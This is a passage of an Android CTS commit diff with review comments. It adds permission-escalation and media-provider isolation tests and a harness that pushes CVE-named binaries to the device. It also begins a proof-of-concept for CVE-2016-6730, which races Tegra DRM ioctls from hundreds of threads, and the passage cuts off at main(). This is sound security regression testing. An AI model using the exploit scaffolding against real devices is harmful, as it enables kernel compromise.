+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testRequestNonRuntimePermission");
     }
 
     public void testRequestNonExistentPermission23() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testRequestNonExistentPermission");
     }
 
     public void testRequestPermissionFromTwoGroups23() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testRequestPermissionFromTwoGroups");
     }
 
 //    public void testOnlyRequestedPermissionsGranted24() throws Exception {
 //        assertNull(getDevice().installPackage(
 //                MigrationHelper.getTestFile(mCtsBuild, APK_24), false, false));
-//        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest24",
+//        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest24",
 //                "testOnlyRequestedPermissionsGranted");
 //    }
 
     public void testUpgradeKeepsPermissions() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_22), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
                 "testAllPermissionsGrantedByDefault");
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testAllPermissionsGrantedOnUpgrade");
     }
 
@@ -253,12 +261,12 @@
     public void testNoResidualPermissionsOnUninstall() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testNoResidualPermissionsOnUninstall_part1");
-        assertNull(getDevice().uninstallPackage(PKG));
+        assertNull(getDevice().uninstallPackage(USES_PERMISSION_PKG));
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testNoResidualPermissionsOnUninstall_part2");
     }
 
@@ -266,28 +274,38 @@
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_22), false, false));
         try {
-            runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+            runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
                     "testRevokePropagatedOnUpgradeOldToNewModel_part1");
             fail("App must be killed on a permission revoke");
         } catch (AssertionError expected) {
         }
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testRevokePropagatedOnUpgradeOldToNewModel_part2");
     }
 
     public void testRevokePropagatedOnUpgradeNewToNewModel() throws Exception {
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testRevokePropagatedOnUpgradeNewToNewModel_part1");
         assertNull(getDevice().installPackage(
                 MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
-        runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+        runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
                 "testRevokePropagatedOnUpgradeNewToNewModel_part2");
     }
 
+    public void testNoPermissionEscalation() throws Exception {
+        assertNull(getDevice().installPackage(MigrationHelper.getTestFile(
+                mCtsBuild, APK_DECLARE_NON_RUNTIME_PERMISSIONS), false, false));
+        assertNull(getDevice().installPackage(MigrationHelper.getTestFile(
+                mCtsBuild, APK_ESCLATE_TO_RUNTIME_PERMISSIONS), true, false));
+        runDeviceTests(ESCALATE_PERMISSION_PKG,
+                "com.android.cts.escalatepermission.PermissionEscalationTest",
+                "testCannotEscalateNonRuntimePermissionsToRuntime");
+    }
+
     private void runDeviceTests(String packageName, String testClassName, String testMethodName)
             throws DeviceNotAvailableException {
         Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
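Review bot: `APK_ESCLATE_TO_RUNTIME_PERMISSIONS` in the new testNoPermissionEscalation is misspelled (the A of ESCALATE is missing); the constant is declared outside this hunk, so the rename to `APK_ESCALATE_TO_RUNTIME_PERMISSIONS` has to be made there as well. The test would also benefit from a one-line statement of the invariant it checks, e.g. `// Upgrade from an APK declaring normal/signature permissions to one redeclaring them as dangerous; the protection level must not change.` Whether ESCALATE_PERMISSION_PKG is uninstalled afterwards depends on setUp/tearDown, which are not visible here, so that is worth confirming to keep the custom permission definitions out of later tests. Separately, in the context lines at the top of this hunk (the enclosing method starts outside it), `fail("App must be killed on a permission revoke")` sits inside a `try` whose `catch (AssertionError expected)` appears to swallow the very failure it raises.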
diff --git a/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk
new file mode 100644
index 0000000..b98ba68
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk
@@ -0,0 +1,29 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := tests
+
+LOCAL_PACKAGE_NAME := CtsDeclareNonRuntimePermissions
+
+LOCAL_COMPATIBILITY_SUITE := cts
+
+LOCAL_DEX_PREOPT := false
+
+include $(BUILD_CTS_SUPPORT_PACKAGE)
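Review bot: The directory is named `DeclareNotRuntimePermissions` while the module it builds is `CtsDeclareNonRuntimePermissions` ("Not" versus "Non"), which makes the test app harder to find from the name listed in OldCtsTestCaseList.mk. Renaming the directory to `DeclareNonRuntimePermissions` would keep the two in step.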
diff --git a/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml
new file mode 100644
index 0000000..411a66b
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+     Licensed under the Apache License, Version 2.0 (the "License");
+     you may not use this file except in compliance with the License.
+     You may obtain a copy of the License at
+
+          http://www.apache.org/licenses/LICENSE-2.0
+
+     Unless required by applicable law or agreed to in writing, software
+     distributed under the License is distributed on an "AS IS" BASIS,
+     WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+     See the License for the specific language governing permissions and
+     limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+        package="com.android.cts.escalate.permission">
+
+    <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"
+        android:permissionGroup="android.permission-group.MICROPHONE"
+        android:protectionLevel="normal"/>
+
+    <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"
+        android:permissionGroup="android.permission-group.MICROPHONE"
+        android:protectionLevel="signature"/>
+
+    <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"/>
+    <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"/>
+
+    <application android:hasCode="false"/>
+
+</manifest>
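Review bot: Nothing in this manifest, or in the EscalateToRuntimePermissions one added later in the commit, says that the two deliberately share the package `com.android.cts.escalate.permission` and the same permission names, which is what turns the second install into an upgrade of the first. A comment above the `<permission>` elements would make the pairing explicit, e.g. `<!-- Baseline for PermissionEscalationTest: STEAL_AUDIO1 is normal and STEAL_AUDIO2 is signature; the upgrade APK redeclares both as dangerous. -->`. The matching comment in the other manifest should state that the redeclaration is expected to be ignored by the platform.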
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk
new file mode 100644
index 0000000..b1b7f83
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk
@@ -0,0 +1,35 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := tests
+
+LOCAL_STATIC_JAVA_LIBRARIES := android-support-test
+
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+
+LOCAL_PACKAGE_NAME := CtsEscalateToRuntimePermissions
+
+LOCAL_COMPATIBILITY_SUITE := cts
+
+LOCAL_PROGUARD_ENABLED := disabled
+
+LOCAL_DEX_PREOPT := false
+
+include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml
new file mode 100644
index 0000000..198bb39
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml
@@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+     Licensed under the Apache License, Version 2.0 (the "License");
+     you may not use this file except in compliance with the License.
+     You may obtain a copy of the License at
+
+          http://www.apache.org/licenses/LICENSE-2.0
+
+     Unless required by applicable law or agreed to in writing, software
+     distributed under the License is distributed on an "AS IS" BASIS,
+     WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+     See the License for the specific language governing permissions and
+     limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+        package="com.android.cts.escalate.permission">
+
+    <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"
+        android:permissionGroup="android.permission-group.MICROPHONE"
+        android:protectionLevel="dangerous"/>
+
+    <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"
+        android:permissionGroup="android.permission-group.MICROPHONE"
+        android:protectionLevel="dangerous"/>
+
+    <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"/>
+    <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"/>
+
+    <application/>
+
+
+    <instrumentation
+        android:name="android.support.test.runner.AndroidJUnitRunner"
+        android:targetPackage="com.android.cts.escalate.permission" />
+
+</manifest>
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml
new file mode 100644
index 0000000..bd208bc
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!-- Just need this dummy file to force building Manifest.java. -->
+<resources xmlns:xliff="urn:oasis:names:tc:xliff:document:1.2">
+  <string name="keysets_perm_desc">keysets_perm_description</string>
+</resources>
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java
new file mode 100644
index 0000000..bbe8e02
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.cts.escalatepermission;
+
+import android.content.Context;
+import android.content.pm.PermissionInfo;
+import android.support.test.InstrumentationRegistry;
+import android.support.test.runner.AndroidJUnit4;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import static org.junit.Assert.assertSame;
+
+import com.android.cts.escalate.permission.Manifest;
+
+@RunWith(AndroidJUnit4.class)
+public class PermissionEscalationTest {
+    @Test
+    public void testCannotEscalateNonRuntimePermissionsToRuntime() throws Exception {
+        Context context = InstrumentationRegistry.getTargetContext();
+
+        // Ensure normal permission cannot be made dangerous
+        PermissionInfo stealAudio1Permission1 = context.getPackageManager()
+                .getPermissionInfo(Manifest.permission.STEAL_AUDIO1, 0);
+        assertSame("Shouldn't be able to change normal permission to dangerous",
+                PermissionInfo.PROTECTION_NORMAL, (stealAudio1Permission1.protectionLevel
+                        & PermissionInfo.PROTECTION_MASK_BASE));
+
+        // Ensure signature permission cannot be made dangerous
+        PermissionInfo stealAudio1Permission2 = context.getPackageManager()
+                .getPermissionInfo(Manifest.permission.STEAL_AUDIO2, 0);
+        assertSame("Shouldn't be able to change signature permission to dangerous",
+                PermissionInfo.PROTECTION_SIGNATURE, (stealAudio1Permission2.protectionLevel
+                        & PermissionInfo.PROTECTION_MASK_BASE));
+     }
+ }
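Review bot: `assertSame` compares object identity, so both checks in testCannotEscalateNonRuntimePermissionsToRuntime compare two autoboxed Integer objects and only hold because the masked values are small enough to come from the Integer box cache. `assertEquals` states the intent without relying on that, e.g. `assertEquals("Shouldn't be able to change normal permission to dangerous", PermissionInfo.PROTECTION_NORMAL, stealAudio1Permission1.protectionLevel & PermissionInfo.PROTECTION_MASK_BASE);` with the static import switched to `org.junit.Assert.assertEquals`, and the same change for the signature check. The second local, `stealAudio1Permission2`, holds STEAL_AUDIO2 and would read better as `stealAudio2Permission`.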
diff --git a/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java b/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
index d9f00d2..3cf1443 100644
--- a/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
+++ b/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
@@ -17,15 +17,20 @@
 package com.android.cts.multiuserstorageapp;
 
 import static com.android.cts.externalstorageapp.CommonExternalStorageTest.assertDirNoAccess;
+import static com.android.cts.externalstorageapp.CommonExternalStorageTest.assertFileNoAccess;
 import static com.android.cts.externalstorageapp.CommonExternalStorageTest.getAllPackageSpecificPathsExceptObb;
 import static com.android.cts.externalstorageapp.CommonExternalStorageTest.readInt;
 import static com.android.cts.externalstorageapp.CommonExternalStorageTest.writeInt;
 
+import android.content.ContentResolver;
+import android.content.ContentValues;
+import android.net.Uri;
 import android.os.Environment;
 import android.test.AndroidTestCase;
 import android.util.Log;
 
 import java.io.File;
+import java.io.FileNotFoundException;
 
 /**
  * Test multi-user emulated storage environment, ensuring that each user has
@@ -138,6 +143,36 @@
         }
     }
 
+    /**
+     * Verify that files cannot be accessed through media provider.
+     */
+    public void testMediaProviderUserIsolation() throws Exception {
+        final File myPath = Environment.getExternalStorageDirectory();
+        final int myId = android.os.Process.myUid() / 100000;
+        assertEquals(String.valueOf(myId), myPath.getName());
+
+        Log.d(TAG, "My path is " + myPath + " user id " + myId);
+        final File basePath = myPath.getParentFile();
+        for (int i = 0; i < 128; i++) {
+            if (i == myId) continue;
+            final File otherPath = new File(basePath,i + "/" + FILE_SINGLETON);
+            assertFileNoAccess(otherPath);
+
+            final String URI_MEDIA_STRING = "content://media/external/audio/media/";
+            ContentResolver contentResolver = mContext.getContentResolver();
+            ContentValues cv = new ContentValues();
+            cv.put("_data", otherPath.getAbsolutePath());
+            contentResolver.insert(Uri.parse(URI_MEDIA_STRING), cv);
+
+            try {
+                mContext.getContentResolver().openInputStream(Uri.parse(URI_MEDIA_STRING));
+                fail("Accessing through media provider should not be allowed. Path " + myPath);
+            } catch (FileNotFoundException expected) {
+                // OK
+            }
+        }
+    }
+
     private File buildApiObbPath(String file) {
         return new File(getContext().getObbDir(), file);
     }
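Review bot: The `openInputStream` call in testMediaProviderUserIsolation opens the collection URI `content://media/external/audio/media/` rather than the row URI returned by `contentResolver.insert(...)`, whose result is discarded. Opening a collection URI presumably raises FileNotFoundException whether or not the other user's file is reachable, so the test may pass without exercising the isolation it is meant to verify. Keep the returned Uri and open that, and report `otherPath` instead of `myPath` in the failure message. The `myUid() / 100000` divisor deserves a named constant or a comment, and the media URI and resolver lookup can be hoisted out of the 128-iteration loop.

```java
        final Uri mediaUri = Uri.parse("content://media/external/audio/media/");
        final ContentResolver contentResolver = mContext.getContentResolver();
        // … unchanged: myPath / myId checks, loop header, assertFileNoAccess(otherPath) …
            ContentValues cv = new ContentValues();
            cv.put("_data", otherPath.getAbsolutePath());
            final Uri inserted = contentResolver.insert(mediaUri, cv);
            if (inserted == null) {
                // Provider refused the row, so there is nothing to open for this user.
                continue;
            }

            try {
                contentResolver.openInputStream(inserted);
                fail("Accessing through media provider should not be allowed. Path "
                        + otherPath);
            } catch (FileNotFoundException expected) {
                // OK
            }
```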
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 0056e81..cd68c69 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -14,6 +14,38 @@
      limitations under the License.
 -->
 <configuration description="Config for the CTS Security host tests">
+    <target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
+        <option name="cleanup" value="true" />
+        <option name="push" value="CVE-2016-8412->/data/local/tmp/CVE-2016-8412" />
+        <option name="push" value="CVE-2016-8444->/data/local/tmp/CVE-2016-8444" />
+        <option name="push" value="CVE-2016-8448->/data/local/tmp/CVE-2016-8448" />
+        <option name="push" value="CVE-2016-8449->/data/local/tmp/CVE-2016-8449" />
+        <option name="push" value="CVE-2016-8460->/data/local/tmp/CVE-2016-8460" />
+        <option name="push" value="CVE-2017-0403->/data/local/tmp/CVE-2017-0403" />
+        <option name="push" value="CVE-2017-0404->/data/local/tmp/CVE-2017-0404" />
+        <option name="push" value="CVE-2016-8482->/data/local/tmp/CVE-2016-8482" />
+        <option name="push" value="CVE-2017-0429->/data/local/tmp/CVE-2017-0429" />
+        <option name="push" value="CVE-2016-6730->/data/local/tmp/CVE-2016-6730" />
+        <option name="push" value="CVE-2016-6731->/data/local/tmp/CVE-2016-6731" />
+        <option name="push" value="CVE-2016-6732->/data/local/tmp/CVE-2016-6732" />
+        <option name="push" value="CVE-2016-6733->/data/local/tmp/CVE-2016-6733" />
+        <option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
+        <option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
+        <option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
+        <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
+        <option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
+        <option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
+        <option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
+        <option name="push" value="CVE-2016-8428->/data/local/tmp/CVE-2016-8428" />
+        <option name="push" value="CVE-2016-8429->/data/local/tmp/CVE-2016-8429" />
+        <option name="push" value="CVE-2016-8430->/data/local/tmp/CVE-2016-8430" />
+        <option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
+        <option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
+        <option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
+        <option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
+        <option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
+        <option name="append-bitness" value="true" />
+    </target_preparer>
     <test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
         <option name="jar" value="CtsSecurityHostTestCases.jar" />
         <option name="runtime-hint" value="32s" />
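Review bot: The `push` entries in the new FilePusher block are in no particular order (2016-84xx, then 2017-04xx, then 2016-67xx), which makes a duplicate or missing entry hard to spot as the list grows; sorting them by CVE id would help. A comment above the block would also document the coupling with the build files, e.g. `<!-- Each name must match a LOCAL_MODULE under securityPatch/; append-bitness adds the 32/64 suffix set by LOCAL_MODULE_STEM_32/64. -->`. Only the CVE-2016-6730 and CVE-2016-6731 modules are visible in this part of the diff, so the remaining names should be checked against their makefiles.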
diff --git a/hostsidetests/security/securityPatch/Android.mk b/hostsidetests/security/securityPatch/Android.mk
new file mode 100644
index 0000000..41a41d0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Android.mk
@@ -0,0 +1,17 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+include $(call all-subdir-makefiles)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
new file mode 100644
index 0000000..14337ab
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6730
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
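Review bot: The warning and hardening flags are appended to plain `CFLAGS` and `LDFLAGS`, which the Android make build does not read for a module, so `-Wall`, `-D_FORTIFY_SOURCE=2`, `-fPIE` and `-rdynamic` most likely never reach the compiler or linker for this binary. They also accumulate across makefiles, because `include $(CLEAR_VARS)` only resets `LOCAL_*` variables. Use the module-scoped variables instead, e.g. `LOCAL_CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 ...` and `LOCAL_LDFLAGS += -fPIE -pie -rdynamic`. CVE-2016-6731/Android.mk further down carries the same lines and needs the same change.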
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
new file mode 100644
index 0000000..bfcdb41
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
@@ -0,0 +1,164 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM	900
+#define TRY_TIMES	CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+#define DRM_TEGRA_GET_CLK_CONSTRAINT	0x12
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+    volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+    volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+	__u64 context;
+	__u32 index;
+	__u32 type;
+	__u32 rate;
+	__u32 pad;
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)               _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+	}
+	return ret;
+}
+
+static void prepare()
+{
+	open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+	set_affinity(1);
+
+	while(1){
+		ioctl(fd, DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT, &clk_c);
+	}
+}
+
+int main()
+{
